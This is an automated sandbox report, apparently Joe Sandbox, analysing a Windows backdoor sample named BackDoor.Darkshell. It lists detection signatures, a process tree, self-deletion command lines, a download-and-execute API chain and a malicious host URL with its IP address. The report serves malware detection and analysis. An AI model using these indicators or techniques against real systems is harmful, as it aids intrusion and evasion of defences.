Create Interactive Tour

Windows Analysis Report
SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe

Overview

General Information

Sample name:SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
Analysis ID:1657698
MD5:4194ba809c07479d0b6c3681d218661b
SHA1:2e8c858633dd5d519d8a7231150ddbc24fef2675
SHA256:666e5e939aca03a8c323fc257063430fbab202f6ae1c4bf8c04fe62c75dade4b
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Score:88
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
May modify the system service descriptor table (often done to hook functions)
PE file has a writeable .text section
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Use NTFS Short Name in Command Line
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe (PID: 3244 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe" MD5: 4194BA809C07479D0B6C3681D218661B)
    • WinH83.exe (PID: 3596 cmdline: "C:\Windows\system32\WinH83.exe" MD5: C7B758D198A32EF2BA4112EF346C74BA)
      • cmd.exe (PID: 6696 cmdline: C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 1752 cmdline: C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul, CommandLine: C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, ParentProcessId: 3244, ParentProcessName: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul, ProcessId: 1752, ProcessName: cmd.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeAvira: detected
Source: C:\Windows\SysWOW64\WinH83.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeVirustotal: Detection: 70%Perma Link
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeReversingLabs: Detection: 78%
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb@ source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_0040D07E
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 4x nop then mov dword ptr [00406949h], 00000000h0_2_0040653C
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_0040D06A
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 4x nop then add byte ptr [eax], al0_2_004071E2
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 4x nop then mov dword ptr [00406949h], 00000000h1_2_00406549
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]1_2_0040D07E
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]1_2_0040D06A
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 4x nop then add byte ptr [eax], al1_2_004071E2
Source: Joe Sandbox ViewIP Address: 5.79.71.225 5.79.71.225
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 5.79.71.225:80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040653C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,Sleep,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,0_2_0040653C
Source: global trafficDNS traffic detected: DNS query: www.003zzy.com
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.003zzy.com/ad1in.htm
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.003zzy.com/ad1in.htmC
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.003zzy.com/ad1in.htmC:
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.003zzy.com/ad1in.htmhv
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1368113899.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.003zzy.com/ad1in.htms?
Source: WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.google.com

System Summary

barindex
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WinH83.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401680: DeviceIoControl,GetLastError,0_2_00401680
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_004022C0 OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_004022C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_004023A0 lstrlen,strstr,strstr,_strlwr,_strlwr,lstrcpy,lstrcpy,strstr,Sleep,Sleep,_strlwr,lstrcpy,strstr,strstr,strstr,strcspn,strcspn,strncpy,strncpy,strcspn,strstr,strcspn,strncpy,atoi,socket,htons,connect,send,CreateThread,select,__WSAFDIsSet,recv,InterlockedExchange,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,recv,CreateThread,send,shutdown,closesocket,ExitWindowsEx,ExitWindowsEx,InterlockedExchange,OpenMutexA,ReleaseMutex,CloseHandle,GetSystemDirectoryA,lstrcat,lstrcat,lstrcat,DeleteFileA,wsprintfA,SHDeleteKeyA,closesocket,ExitProcess,InterlockedExchange,shutdown,closesocket,0_2_004023A0
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_004023A0 lstrlen,strstr,strstr,_strlwr,_strlwr,lstrcpy,lstrcpy,strstr,Sleep,Sleep,_strlwr,lstrcpy,strstr,strstr,strstr,strcspn,strcspn,strncpy,strncpy,strcspn,strstr,strcspn,strncpy,atoi,socket,htons,connect,send,CreateThread,select,__WSAFDIsSet,recv,InterlockedExchange,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,recv,CreateThread,send,shutdown,closesocket,ExitWindowsEx,ExitWindowsEx,InterlockedExchange,OpenMutexA,ReleaseMutex,CloseHandle,GetSystemDirectoryA,lstrcat,lstrcat,lstrcat,DeleteFileA,wsprintfA,SHDeleteKeyA,closesocket,ExitProcess,InterlockedExchange,shutdown,closesocket,1_2_004023A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeFile created: C:\Windows\SysWOW64\WinH83.exeJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeFile created: C:\Windows\SysWOW64\WinH83.exe:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_004023A00_2_004023A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_004078A80_2_004078A8
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_004023A01_2_004023A0
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_004078A81_2_004078A8
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZhuDongFangYu.exe0 vs SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeBinary or memory string: OriginalFilenameZhuDongFangYu.exe0 vs SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal88.evad.winEXE@8/4@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401390 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00401390
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_00401390 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,CloseHandle,1_2_00401390
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,StartServiceA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA,0_2_00402170
Source: C:\Windows\SysWOW64\WinH83.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,StartServiceA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA,1_2_00402170
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401D00 SetErrorMode,GetModuleHandleA,FreeLibrary,lstrcat,GetModuleFileNameA,lstrcmpi,lstrcmpi,GetCurrentProcess,SetPriorityClass,lstrcmpi,CopyFileA,SetFileAttributesA,ExitProcess,StartServiceCtrlDispatcherA,lstrcmpi,0_2_00401D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401D00 SetErrorMode,GetModuleHandleA,FreeLibrary,lstrcat,GetModuleFileNameA,lstrcmpi,lstrcmpi,GetCurrentProcess,SetPriorityClass,lstrcmpi,CopyFileA,SetFileAttributesA,ExitProcess,StartServiceCtrlDispatcherA,lstrcmpi,0_2_00401D00
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_00401D00 SetErrorMode,GetModuleHandleA,FreeLibrary,lstrcat,GetModuleFileNameA,lstrcmpi,lstrcmpi,GetCurrentProcess,SetPriorityClass,lstrcmpi,CopyFileA,SetFileAttributesA,ExitProcess,StartServiceCtrlDispatcherA,lstrcmpi,1_2_00401D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeVirustotal: Detection: 70%
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess created: C:\Windows\SysWOW64\WinH83.exe "C:\Windows\system32\WinH83.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
Source: C:\Windows\SysWOW64\WinH83.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess created: C:\Windows\SysWOW64\WinH83.exe "C:\Windows\system32\WinH83.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nulJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nulJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic file information: File size 25208853 > 1048576
Source: Binary string: c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb@ source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, WinH83.exe, WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040D07E LoadLibraryA,GetProcAddress,EntryPoint,DeleteFileA,0_2_0040D07E
Source: initial sampleStatic PE information: section where entry point is pointing to: 300
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic PE information: section name: .mackt
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic PE information: section name: .vmp0
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic PE information: section name: 300
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic PE information: section name: .Katja
Source: WinH83.exe.0.drStatic PE information: section name: .mackt
Source: WinH83.exe.0.drStatic PE information: section name: .vmp0
Source: WinH83.exe.0.drStatic PE information: section name: 300
Source: WinH83.exe.0.drStatic PE information: section name: .Katja
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040B249 push ebp; mov dword ptr [esp], 017435ECh0_2_0040B254
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040B000 pushfd ; mov dword ptr [esp], 00000000h0_2_0040B006
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040B213 push dword ptr [esp+50h]; retn 0054h0_2_0040B232
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040B235 push ebp; mov dword ptr [esp], 017435ECh0_2_0040B254
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_004056D0 push eax; ret 0_2_004056FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401BED push 00402310h; ret 0_2_00401C06
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040B281 push dword ptr [esp+04h]; retn 0008h0_2_0040B28F
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040788D push ecx; ret 0_2_004078A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040B292 pushfd ; mov dword ptr [esp], 004067FDh0_2_0040B298
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_0040B249 push ebp; mov dword ptr [esp], 017435ECh1_2_0040B254
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_0040B000 pushfd ; mov dword ptr [esp], 00000000h1_2_0040B006
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_0040B213 push dword ptr [esp+50h]; retn 0054h1_2_0040B232
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_0040B235 push ebp; mov dword ptr [esp], 017435ECh1_2_0040B254
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_004056D0 push eax; ret 1_2_004056FE
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_00401BED push 00402310h; ret 1_2_00401C06
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_0040B281 push dword ptr [esp+04h]; retn 0008h1_2_0040B28F
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_0040788D push ecx; ret 1_2_004078A0
Source: C:\Windows\SysWOW64\WinH83.exeCode function: 1_2_00406819 pushfd ; mov dword ptr [esp], 004067FDh1_2_0040B298
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeStatic PE information: section name: .text entropy: 7.183221181125893
Source: WinH83.exe.0.drStatic PE information: section name: .text entropy: 7.183221181125893

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeExecutable created and started: C:\Windows\SysWOW64\WinH83.exeJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_0040653C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,Sleep,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,0_2_0040653C
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeFile created: C:\Windows\SysWOW64\WinH83.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeFile created: C:\Windows\SysWOW64\WinH83.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeCode function: 0_2_00401D00 SetErrorMode,GetModuleHandleA,FreeLibrary,lstrcat,GetModuleFileNameA,lstrcmpi,lstrcmpi,GetCurrentProcess,SetPriorityClass,lstrcmpi,CopyFileA,SetFileAttributesA,ExitProcess,StartServiceCtrlDispatcherA,lstrcmpi,0_2_00401D00

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
Source: C:\Windows\SysWOW64\WinH83.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nulJump to behavior
Source: C:\Windows\SysWOW64\WinH83.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nulJump to behavior
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeBinary or memory string: KeServiceDescriptorTable
Source: SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe, 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: KeServiceDescriptorTable
Source: WinH83.exeBinary or memory string: KeServiceDescriptorTable
Source: WinH83.exe, 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: KeServiceDescriptorTable
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
